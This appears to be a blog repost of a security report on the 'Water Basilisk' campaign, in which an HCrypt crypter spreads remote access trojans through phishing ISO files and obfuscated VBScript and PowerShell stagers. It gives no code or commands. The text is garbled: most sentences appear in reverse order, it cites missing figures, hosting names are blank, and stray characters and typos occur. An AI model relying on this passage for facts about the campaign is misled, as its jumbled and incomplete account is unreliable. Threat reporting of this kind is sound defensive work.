In Figure 12, $HH1 is a VBNET PE injector DLL and $HH5 contains a PowerShell command to pass a final malware payload ($HH3) into the given process, which is “aspnet_regbrowsers.exe.” Figure 5 is an example of the account used to host scripts.Īmong the loaded binaries is a DLL injector called “VBNET,” which reflectively loads a. Once the ISO file is opened the needed scripts are downloaded from this hosting archive. This improves the chances of a victim opening the file and infecting their system.Īs we have also mentioned, and as seen in Figure 4, an interesting aspect of this attack is how HCrypt developers host stager scripts were hosted from public file hosting services such as Transfer.sh and Internet Archive (). Another is how opening an ISO file in new operating systems is as simple as double-clicking the file, due to native IOS mounting tools. One is how ISO images tend to have larger file sizes, making it so that email gateway scanners would not be able to scan ISO file attachments properly. We can assume two reasons why this attack uses ISO files. The attack begins with the malicious ISO image file. Both have the same infection chain, which we have already described. This campaign uses two different attack vectors: phishing websites and emails. The latest version of this crypter is 7.8, based on what we have seen in its builder and website. HCrypt creates various obfuscated VBScripts and PowerShell to deliver or inject the final payload into a given process in a victim system. In a nutshell, Water Basilisk’s attack chain is a combination of the VBScript and PowerShell commands. These are typically NjRat, BitRat, Nanocore RAT, QuasarRat, LimeRat, and Warzone. In some cases, the final stage PowerShell script contained up to seven various RATs. The final stage is an obfuscated PowerShell script that contains the payloads and is responsible for deobfuscating and injecting them into the assigned process. This file contains an obfuscated VBScript stager responsible for downloading and executing the next stage of the VBScript content onto the infected system memory. The malicious file is hidden as an ISO that is distributed through a phishing email or website. In this campaign, which we have labelled Water Basilisk, the attacker mostly used publicly available file hosting services such as “”, “transfer.sh”, and "", to host the malware while hacked WordPress websites were used to host phishing kits. The campaign also showed new obfuscation techniques and attack vectors, different from those that were observed in the past. It is identified as a crypter-as-a-service, paid for by threat actors to load a RAT (or in this case RATs) of their choosing. HCrypt is a crypter and multistage generator that is considered difficult to detect. It reached the peak of activity in the middle of August 2021. This new variant uses a newer obfuscation mechanism compared to what has been observed in past reports. We encountered a fileless campaign that used a new HCrypt variant to distribute numerous remote access trojans (RATs) in victim systems.
0 Comments
Leave a Reply. |